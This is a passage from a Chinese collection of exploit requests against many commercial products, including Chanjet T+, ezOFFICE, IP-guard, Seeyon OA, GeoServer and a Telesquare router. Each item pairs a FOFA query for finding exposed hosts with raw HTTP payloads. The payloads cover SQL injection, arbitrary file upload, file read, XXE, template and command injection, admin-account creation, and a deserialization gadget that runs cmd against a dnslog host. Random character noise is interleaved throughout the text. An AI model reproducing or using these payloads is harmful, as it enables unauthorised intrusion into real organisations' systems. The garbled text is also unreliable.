User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36) o+ G; v. P/ Q# ]7 m) b
Content-Type: application/json
( D9 c- ^) R. j& ]" F& O7 y' i* B# G3 P5 R/ W( m
{
. j5 d6 r2 n" Q4 r- i( M "storeID":{( D( P; F* j( Y% l& l
"__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",( t: z3 n+ f( }# y
"MethodName":"Start",# {5 ?' D- i2 R& X% { N% R* }
"ObjectInstance":{
& f' a" M6 b8 A, o7 m1 F" c7 W) F7 { "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089"," e. A7 g/ A% A- P0 [9 y! U& Z7 k
"StartInfo": {
. ]2 z' m) `; U$ `+ E "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",4 z# ], |) x: p. R5 C9 `; S0 F5 G
"FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw"
: t: n, ?1 Z% ?2 G9 c1 F+ o; H) L }
) _" F! P: b; h @, w$ c }
/ c; z6 Z' T4 g& }4 @0 ] ?5 v9 w }
* c% I" \9 ?" ~2 n. _+ |}$ E7 C( _* q" _0 p) P* t/ Q) t _% a
4 \; h, u5 L3 g& {
/ d; X8 \, j" v5 [/ B/ ?- r8 Y* n, t57. 畅捷通T+ keyEdit.aspx SQL注入
* H: Z- S5 ^5 a. Z$ RFOFA:app="畅捷通-TPlus"3 ~9 z5 q* x9 ]$ k0 e
GET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1
' m# n& M7 o( N5 Y0 iHost: host- [) A! s6 q. C' ^% f8 _
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
+ [" p$ L% f( k1 T+ o5 U& xAccept-Charset: utf-81 e A$ t# u2 x# Z6 F3 i3 H
Accept-Encoding: gzip, deflate
) e$ A3 `% f5 l+ |6 nConnection: close: _" X. T3 y3 j
, i$ D2 |9 {7 ?3 Q7 S
) k2 v" F/ F: s1 K58. 畅捷通T+ KeyInfoList.aspx sql注入
) S; C0 o% U$ l. ] E cFOFA:app="畅捷通-TPlus"- s; p5 B" d+ k
GET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.1
1 w9 \ R; ]- p7 U& h: _Host: your-ip6 i7 j$ h2 Z4 |0 o) O5 @
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.363 n7 k [( I; N8 i& I! y0 |
Accept-Charset: utf-8
' o0 `& i* x7 T3 d" G- ?Accept-Encoding: gzip, deflate
' y2 X6 g$ ?# XConnection: close! ]9 @! Z4 h4 h2 g) A7 U# f0 Z7 I
% L& x: [) s" U, [" s
! U* ~1 e# }) W! |7 h0 S6 e& ?59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行
- q% I8 l. U3 e: [FOFA: title="@XETUX" && title="XPOS" && body="BackEnd"+ Q; K3 a7 Q. h3 O( T! @6 Y- ^
POST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1% V# h0 m, s/ ^7 G& P" f n, \
Host: 192.168.86.128:90901 R( [& P0 F' F: ~6 j2 g1 X0 d
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36 x6 P# ~" q6 [7 h) l2 A
Connection: close
9 O: d' D7 T7 @# g* RContent-Length: 1669- W k8 k9 O# D6 {
Accept: */*
3 r. u% `/ `9 S2 d yAccept-Language: en
6 I; j$ a. e- m- PContent-Type: application/x-www-form-urlencoded
7 y* f, R4 ~# m8 m1 FAccept-Encoding: gzip
3 n) W! A: p- k# p, V7 D$ a; c( P6 \
PAYLOAD
; m! w8 m& j1 K' n3 y6 B# W5 l! ~
4 W8 ]" R% E. C2 I" s6 k) s& b6 e' c! L% N
60. 百卓Smart管理平台 importexport.php SQL注入
- }: p- M8 u. P% T5 gFOFA:title="Smart管理平台"
( d. B y: u w* m; kGET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1; M' _8 B$ C! f4 V
Host:3 v/ a. F [9 V4 q# U" o
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36+ e9 J% Q( y! @# z. O, V4 o% ^
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7/ G5 l& t+ f4 [- h+ g# l2 G2 K
Accept-Encoding: gzip, deflate! N4 ]% |* i! Y" p# N' j+ C7 z& V
Accept-Language: zh-CN,zh;q=0.9. U8 |4 g( R8 {7 A# A: [& Z1 K+ l% D
Connection: close- Z* f% I3 T8 R5 [! Q
. B" H/ `- f. S1 Q, S5 ~* D% T3 O
61. 浙大恩特客户资源管理系统 fileupload 任意文件上传* N* j$ I! r1 v3 n, J
FOFA: title="欢迎使用浙大恩特客户资源管理系统"# t. S# J$ \ T1 D9 e0 j* V4 n
POST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.1
; c+ `' N: o1 V% E0 O3 l1 ~Host: x.x.x.x1 T" V+ `4 u3 {. Q t- K
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15, A! S- h# x. g: v( U% o
Connection: close3 y( w/ T3 A- _0 ?
Content-Length: 27. M7 @2 N' D- r) B! G, _3 e
Accept: */*
6 [; u5 p0 }7 T$ ^! ~Accept-Encoding: gzip, deflate g7 p4 D6 t5 z
Accept-Language: en
5 H" N+ C2 G! d" B' M E+ W$ |Content-Type: application/x-www-form-urlencoded
* [/ l0 x2 c) Z! X2 _8 E
8 {6 O6 @9 r" S* `8uxssX66eqrqtKObcVa0kid98xa& E {! b. F' F V9 T; G# u: L
' X" G0 i. X5 h2 @. [$ c; q, X
v- F: b$ D5 f1 m2 @4 Y62. IP-guard WebServer 远程命令执行: Q9 p0 u: a, A! c
FOFA:"IP-guard" && icon_hash="2030860561"
% T9 F. n) i" G( }# }3 @: [% oGET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1/ b2 F0 _! @2 }$ c/ W
Host: x.x.x.x( j# Z o7 }! c
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36
' E3 D. @' G+ K2 Y6 \$ @1 ^8 OConnection: close
6 ^0 T/ n2 n4 [$ s' r5 e* c3 W4 L+ }Accept: */*
; H, P) d7 e, Y: Y; ^2 y! M% @& j+ uAccept-Language: en6 H/ v* y/ o4 w0 u! N
Accept-Encoding: gzip
2 W1 S B5 {0 a( z
) \2 [" w8 v# e0 V
3 _2 B3 P7 R) I% `$ D! ]. R8 i访问
/ S0 C: h. ^/ n) q" Y
# q) S7 D: d. Q, k0 N5 H$ ~GET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.13 i5 x( w/ V/ c9 U) u9 n. [; {
Host: x.x.x.x
- ^. I% G: c5 T$ I
* S8 p) o9 k, Y) W* M& `" q: V0 I7 `
63. IP-guard WebServer任意文件读取& k" {( s$ F' l: n# n. n
IP-guard < 4.82.0609.03 V- |+ c$ |+ b- T" ?1 m
FOFA:icon_hash="2030860561"
) m3 i2 s+ @1 F- G6 c) y4 X2 DPOST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.18 z; a0 J/ [0 B
Host: your-ip. f6 D+ B1 S. n9 r# o. ?
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
5 I( a! s7 M/ B9 FAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7& O/ L2 L3 ]+ l
Accept-Encoding: gzip, deflate0 |0 d* J5 e$ p/ A( ]& ?6 i" B5 S
Accept-Language: zh-CN,zh;q=0.9
7 w7 h, o- t6 T" Q0 \4 W" ^8 }, AConnection: close
* {; S. u* l/ \& a+ G qContent-Type: application/x-www-form-urlencoded' n8 Q: H, f1 a$ [
0 f, U& ?5 b; E) I/ [4 E
path=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A6 x: P m2 g) Y' S0 G; M
* |" Y0 a3 K3 O/ v3 f64. 捷诚管理信息系统CWSFinanceCommon SQL注入* A: P& ?' E7 V. g: I7 T
FOFA:body="/Scripts/EnjoyMsg.js"; F7 d6 K% H6 H3 y4 d9 Z: ~! J: D
POST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1
- o' s* e: |" j4 fHost: 192.168.86.128:9001' |4 \% ?/ B1 ] A
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
% M0 [ C! e, y- @Connection: close
( ]: {& M& ]7 Q8 u9 N4 DContent-Length: 369. ^+ K3 N0 T1 s! |/ m! }/ m7 g
Accept: */*
+ p9 j" B; a3 e% W; UAccept-Language: en) T' w) Y/ r7 I% x" {
Content-Type: text/xml; charset=utf-8% k* h9 Z9 F, b+ b) m" p) Y, a6 _. q
Accept-Encoding: gzip
# R% W, I, Y$ E4 @( @. e
& o8 d2 x8 D+ A) q1 v: }<?xml version="1.0" encoding="utf-8"?>
$ y6 J2 P9 y9 M<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
; y; S6 Y) X( M+ `* [0 U3 \0 N<soap:Body>& J8 H$ ~( E, _* k8 L0 h
<GetOSpById xmlns="http://tempuri.org/">
' ?" n' h, K& T7 \3 s; u! r/ l; u <sId>1';waitfor delay '0:0:5'--+</sId>
( \2 T" D S% Z+ h: I3 ? </GetOSpById>
; r( c9 \. d' Q0 C </soap:Body>
0 g$ g9 F2 D) V: K</soap:Envelope>
( R/ I" ]7 F, Y) R( U2 @# i# A9 a7 n" d8 @1 Y% x# X6 Q( U5 I9 u
7 g/ N' `% a& e, E65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过) |+ r- h- a% }9 X: Z) {
FOFA:title="欢迎使用脸爱云 一脸通智慧管理平台": ~/ y, u$ M& Y- \! d* a
响应200即成功创建账号test123456/123456
8 ^/ c/ l) ?, P j! {* v# BPOST /SystemMng.ashx HTTP/1.1
* n0 i3 i0 n: s4 f3 J- GHost:
; t! D* M" a# ? tUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
5 F6 _0 x5 `( L3 r9 [* ^1 G% cAccept-Encoding: gzip, deflate: D; ^2 I! H" n
Accept: */*2 D& P: i# l+ E) a! Z
Connection: close
. I/ V |4 z* F/ v; z" o. i) OAccept-Language: en
* X2 K9 e K/ MContent-Length: 174
( G% @8 f* o9 B; M* y
* H/ E, @$ K! e% _+ YoperatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators4 Z" Q! e5 g; d3 ?
4 _6 X# b' j# g6 }' G& v% [2 l& N' |& P; ~0 w# l p9 h! t- G
66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入% B. M( }% u1 b7 {
FOFA:app="万户ezOFFICE协同管理平台"; a( A" p# `/ k' _' g
0 f* E5 c, i( d8 G+ M/ Y; Q
GET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.18 Z i* M" G, C9 j! \6 t
Host: x.x.x.x9 U8 }- U# I; ~9 b2 p8 ^
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.366 T- {. `# q$ c b* ^. g
Connection: close9 }5 D& ^- _8 E9 y
Accept: */*' _' ?6 w- K( a9 \
Accept-Language: en
2 X$ ?; V( o7 _$ B @; v& R: fAccept-Encoding: gzip
" T; a: K+ k4 Z4 }0 ~: U( g9 S
; N7 a+ |: I5 h8 \6 k# C+ m1 \" A
+ M3 V7 W( k( S `& h6 N, H3 s第42,43行包含6cfe798ba8e5b85feb50164c59f4bec9字符串证明漏洞存在$ o7 M2 H, F0 `% ^! P4 G4 m
9 {' l, y* }( T3 e9 K$ E67. 万户ezOFFICE wpsservlet任意文件上传
. }$ s; j/ w' p# EFOFA:app="万户网络-ezOFFICE") W. I! j' a% S0 Y2 M! C8 F
newdocId和filename参数表示写入文件名称,dir参数表示写入文件的路径,fileType参数表示文件类型
W2 ?7 Z8 @1 O8 [1 d0 ~7 CPOST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1
3 r# Q$ Y3 I* r) P2 U9 WHost: x.x.x.x
; E' _1 l* k6 GUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.04 o8 O3 C( q, O. [7 V; {
Content-Length: 1738 ^' C. g, o. o! z! i7 o
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' ~7 K$ _3 E& u* } t! c; d
Accept-Encoding: gzip, deflate
, b& J+ W$ M- MAccept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
; {( e+ m% @- C& b1 {Connection: close
! s3 _: O, |* {& p2 |Content-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp
% ^9 i" S: N& YDNT: 1
9 h0 X+ }: Y# v# g% bUpgrade-Insecure-Requests: 1- ?, T# {4 o2 E6 L: ]0 U
8 I3 h* G0 Z) |# `
--ufuadpxathqvxfqnuyuqaozvseiueerp) f- Q2 ^' V; O- p$ r2 D* E
Content-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp") `3 l' b* ?# Q
+ n1 ?4 t( {* I- }<% out.print("sasdfghjkj");%>% n! i& P& p# z9 W
--ufuadpxathqvxfqnuyuqaozvseiueerp--
. r( N3 G, ~, O- h! K, d" ^! `1 ^6 ~( w3 S: I- }+ F- W
4 f2 {/ |9 N0 M
文件回显路径为/defaultroot/platform/portal/layout/apoxkq.jsp1 |$ v; w+ t$ [$ ]
3 U I2 v" s0 f; N. D( u9 z
68. 万户ezOFFICE wf_printnum.jsp SQL注入
6 G4 X& B; d# {: r* q% jFOFA:app="万户ezOFFICE协同管理平台"" c; W- t0 j- _! g
GET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
: `; ~; s* }! y' w% XHost: {{host}}
5 a. e8 d% {& L5 v0 ?/ q+ H1 sUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
5 X" S* k0 h, V/ R9 ]* h0 s) j% N9 iAccept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
1 s8 p ]/ i( q3 M! v/ Q' a" EAccept-Encoding: gzip, deflate
7 b. f7 {3 I" y7 B' J9 BAccept-Language: zh-CN,zh;q=0.9
3 W3 D. @6 M4 T, D* Z0 z1 E% `Connection: close" r6 p# k, r" Q$ e! N
! ?8 c2 y H+ E' f) b7 L
. [$ \& H$ ~& s! P! W, Y69. 万户 ezOFFICE contract_gd.jsp SQL注入. H8 V$ L! t; U+ T& ~) F( g& A
FOFA:app="万户ezOFFICE协同管理平台"9 E: r0 `. D; v; S. }+ F+ F
GET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.1+ U" e) W' v0 r
Host: your-ip
6 j( o+ t9 L/ }- s9 hUser-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
% L+ F& W! ], E9 P w7 pAccept-Encoding: gzip, deflate; s" N) k" d& J
Accept: */*
: X3 Q, Y5 w0 v# e- u; |" b! {Connection: keep-alive
" l. O* d: z' J2 ~
, r0 g! ?" o' A
$ J8 {3 O1 L6 t D70. 万户ezEIP success 命令执行
% V7 p8 H5 C) y; e \FOFA:app="万户网络-ezEIP"0 @* X0 @0 `* ?) g6 w) r+ E* o
POST /member/success.aspx HTTP/1.1; v5 R$ B& c$ a% M5 @- |6 ^4 H# o/ R
Host: {{Hostname}}9 r; b/ ]! ?0 f# \$ x6 G. p* Y$ e. u
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
! F+ H0 v6 S& G8 X* Z" TSID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=1 I- Q4 R8 Q: J
Content-Type: application/x-www-form-urlencoded& c. ?- d6 r3 _
TYPE: C
5 J( o( T& t6 v Y7 K% KContent-Length: 167026 k5 Q" i7 b! b# W4 P% e0 {: J
* V& [% Z2 Z: E' z1 {* f7 V
__VIEWSTATE=PAYLOAD7 w. ]2 \3 ~+ E' a
X7 I* P& k$ J4 n# Z
% l: i R7 o; r8 D6 Q) s% U
71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入" z6 ^3 r& l! Z9 i0 }7 u
FOFA:body="PM2项目管理系统BS版增强工具.zip"
: g! t5 F! c! u, Y. RGET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1
; E( S( M4 ]8 @' F7 x$ Q+ fHost: x.x.x.xx.x.x.x
9 R( n8 {6 V! S/ {3 ~. g* wUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36; E9 `: F6 W2 m2 W
Connection: close
; L K, _7 f( F. ]! aAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8; b! L' }5 @6 j( i
Accept-Encoding: gzip, deflate# P1 s/ o2 P3 j! U' d n& k/ @
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.23 I$ r4 a3 X' q
Upgrade-Insecure-Requests: 1
9 s4 V% X3 c. E3 K4 o- z9 y) a* T: Y" I/ t& q9 r9 p$ {
$ ~2 f& ~9 O8 b, t: ?- I* u72. 致远OA getAjaxDataServlet XXE
, C, O. a' p7 K; rFOFA:app="致远互联-OA"
/ j! W' `9 R" o1 [POST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.16 f) U8 `1 Z, s) c/ K% Q+ {% y
Host: 192.168.40.131:80999 D6 ~2 N5 T' H3 ~/ C- p
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.362 w7 ^) n: {& u
Connection: close3 i; B* J7 M1 t3 @
Content-Length: 5830 h$ |. I- f# z2 F
Content-Type: application/x-www-form-urlencoded
6 @" B p# `; y8 b3 yAccept-Encoding: gzip" y) L9 [; n H8 q' ~
; E0 f4 E# E9 t/ p+ m
S=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%55D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E
7 ]4 M$ n o! P0 E8 W3 x6 b% O" q& ^+ P7 l5 X. a
1 l! O6 Z, w1 Z0 a; ~$ f$ O73. GeoServer wms远程代码执行
% B6 R& O+ D. cFOFA:icon_hash=”97540678”
; y& D. |7 `, JPOST /geoserver/wms HTTP/1.1/ t' A2 a- V8 n/ m# ?$ ~$ D6 p
Host:! P/ T3 `7 v' P1 B
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36. n8 N0 j0 I) H: `% V+ R( k
Content-Length: 1981- q" [5 X4 t8 P- _+ D+ o) ?
Accept-Encoding: gzip, deflate& n* _& ?# W, h5 o
Connection: close
, S5 v. u0 l5 bContent-Type: application/xml
3 A0 @" U: Z7 i. C ySL-CE-SUID: 3+ C% N9 Z: u# A: b
4 ?. x5 }* a$ ?* }" m
PAYLOAD
7 B. b+ Y( ~' j& U: j
# j: b& {! \3 d( W% p& W7 J% s7 m, Y, R6 z% _0 D5 r
74. 致远M3-server 6_1sp1 反序列化RCE
) z8 d& |$ y$ l( zFOFA:title="M3-Server"
9 w2 P* B- E% M& p1 m3 RPAYLOAD
) E- A- ]8 j. B! T+ L5 J, H
' q, \: r% J, Y5 Y75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE
# ~+ O4 c0 s5 T0 W$ P* nFOFA:app="TELESQUARE-TLR-2005KSH"" Z" j3 I- y n9 d: o; i/ k j
GET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.1" ]/ z7 Y: ?! x2 v
Host: x.x.x.x
' Q% ]# W( x) A3 G2 B! Q8 L0 FUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
0 O \0 ]1 | s) u& h) Q" ^3 Q' E8 HConnection: close
`$ G* z$ }; k, U+ i, s. D2 P$ \Accept: */*' ~# Y X, F9 \( c
Accept-Language: en
( T0 T2 p! Z# g' dAccept-Encoding: gzip1 |/ Z% q9 ?" q% T3 G2 ]
2 t$ d$ l& s+ P, f- w8 M | h" B' V, h8 |- E/ v5 p1 ?7 C- i
GET /cgi-bin/test28256.txt HTTP/1.1! ~2 [/ e1 ]' |
Host: x.x.x.x
/ W" i+ K! ]8 Z- h. C5 m1 @- `$ s m( @2 I8 l# `' m
" w7 M) ~0 r( u3 U# V76. 新开普掌上校园服务管理平台service.action远程命令执行
+ L ~3 Y9 e1 I q4 aFOFA:title="掌上校园服务管理平台": R+ W7 F8 U( h1 j8 D) p( y
POST /service_transport/service.action HTTP/1.1: Q1 `% t* o/ ]- Y; b* L/ N
Host: x.x.x.x
% M X4 n# t( Y/ z) dUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
! ^2 A. w, G8 Q7 ]Connection: close/ L8 g7 n0 [# b2 v- f* b
Content-Length: 211
5 c4 I8 q3 [) m: ?4 x: U9 RAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8) E4 H s$ _0 H$ K* k( M$ V5 ^
Accept-Encoding: gzip, deflate
9 p3 U, u3 b& [1 a5 Z6 R" O6 yAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2. k& S4 ^5 [& L, Q% Q
Cookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4
9 B3 d3 {9 l2 T( l; bUpgrade-Insecure-Requests: 1+ P" N$ p! H7 b
% l n5 s) ]& v6 J- v{
& x* u0 q: P t! u7 f"command": "GetFZinfo",
, }0 [) J. c5 k. G. [0 j1 w "UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"( |% C, j9 W' u% D, L
?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"& o$ U' b& L/ F3 \" i9 L0 W
}
' m8 N; [) ?& p! D
; J! z9 s+ O1 y* t/ |" n& D/ i
! H5 n4 L) ]4 GGET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.1+ d2 y7 P" S& s: M
Host: x.x.x.x
3 `: b2 o9 l- P0 |
+ J" n1 U) \2 @# _9 x% l: n% C
% R+ D# D. y+ e' H% y) W( b
9 y- p2 B3 `( |77. F22服装管理软件系统UploadHandler.ashx任意文件上传
7 H8 G2 S/ i) Z$ z+ {! N! mFOFA:body="F22WEB登陆"# |4 r. L8 q+ i; Y/ v8 L
POST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1 T* A! F0 \6 ~
Host: x.x.x.x/ S$ \1 K4 P) l" h+ g0 M E# z6 d
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.366 S: Z1 _1 n+ B
Connection: close# b3 y5 Q4 i2 _& i" [. V9 h
Content-Length: 433
: k; k) j" c7 \ w! sAccept: */*
) U/ {5 G8 {2 z' j- RAccept-Encoding: gzip, deflate
( v$ H9 o( [! v8 T# b4 uAccept-Language: zh-CN,zh;q=0.9
7 l# I, e t! S8 @Content-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix( A, a v* ]6 M" n2 K
! _* A4 J* j, M------------398jnjVTTlDVXHlE7yYnfwBoix
% G/ u& E5 B" J, i! @Content-Disposition: form-data; name="folder"9 M" o7 J& h8 U( I$ R$ |) s( ]* b$ _$ Q
: N$ T4 x4 e' T- u; j% x' z/upload/udplog
+ J1 h6 `) j) y! q5 f------------398jnjVTTlDVXHlE7yYnfwBoix, ^0 J3 c8 I- F+ k; p0 V7 ?' l4 ~
Content-Disposition: form-data; name="Filedata"; filename="1.aspx"1 f6 V$ e! p# A7 P% I
Content-Type: application/octet-stream
" a7 P( J! R$ i) O8 x1 N- U
# T! x% c* t: C+ R. u- ihello1234567- ?, M! X8 g# [, l/ [ |
------------398jnjVTTlDVXHlE7yYnfwBoix
, g3 D5 U+ d+ ^" pContent-Disposition: form-data; name="Upload"
) C1 _5 L+ a' W. I) _) I6 a) W* @& ~2 P% s' z2 [% S! n! J
Submit Query6 K* I" R& k, m# a) ]) a
------------398jnjVTTlDVXHlE7yYnfwBoix--7 I$ j7 Z: q" q) u- k
- e# e/ |4 p2 b/ ?% ^& G) V0 r0 V
5 b8 w! \! F( ]5 _
78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传
( |2 _6 u% l: V! l: z% yFOFA:icon_hash="2001627082") |) [# a; ]) k9 S7 A$ ^
POST /Platform/System/FileUpload.ashx HTTP/1.1* z" H% U3 M. i, d
Host: x.x.x.x
3 g* I: U; H# w: }' L, Y0 NUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15& {0 x% w5 `# i; V# ?7 o7 `
Connection: close( U' d d6 L2 J$ w! f3 ?
Content-Length: 336# Y2 K! E @8 S3 Q" r4 n
Accept-Encoding: gzip
" h6 B$ ~# u2 ?* w* mContent-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l
, e$ Q) k1 [. ]. W! I+ u6 ]* H p' }" V8 o5 a7 f
------YsOxWxSvj1KyZow1PTsh98fdu6l o, q( c: ]% t% [( R/ H" B
Content-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"% F' s9 o" A L5 o
Content-Type: image/png
: \/ V" E/ L2 N# m" a* ?; Y+ F% G& L( p
YsOxWxSvj1KyZow1PTsh98fdu6l w& }( _$ w. T. C3 O
------YsOxWxSvj1KyZow1PTsh98fdu6l0 G+ O* W# J- a8 f& \2 N7 @3 D8 m
Content-Disposition: form-data; name="target"
8 V' r; W4 Z, ^) l8 I/ U! x3 T. P- u
/Applications/SkillDevelopAndEHS/( W+ p3 ~6 H, c m" m& `3 u8 [- i
